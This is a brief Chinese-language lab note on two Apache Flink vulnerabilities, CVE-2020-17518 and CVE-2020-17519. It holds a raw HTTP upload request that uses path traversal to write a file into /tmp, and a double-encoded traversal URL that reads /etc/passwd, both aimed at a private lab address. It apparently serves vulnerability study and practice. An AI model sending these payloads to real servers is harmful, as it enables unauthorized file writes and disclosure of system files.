1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来
操作技巧:
POST /jars/upload HTTP/1.1
Host: 192.168.110.129:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 214
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success.jar"
Content-Type: text/plain
111111
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
漏洞原理:
漏洞版本:Apache Flink 1.5.1 ~ 1.11.2
2.apache flink目录遍历(CVE-2020-17519)
操作技巧:
http://192.168.110.129:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpa
sswd
漏洞原理:
漏洞版本:Apache Flink 1.11.0-1.11.2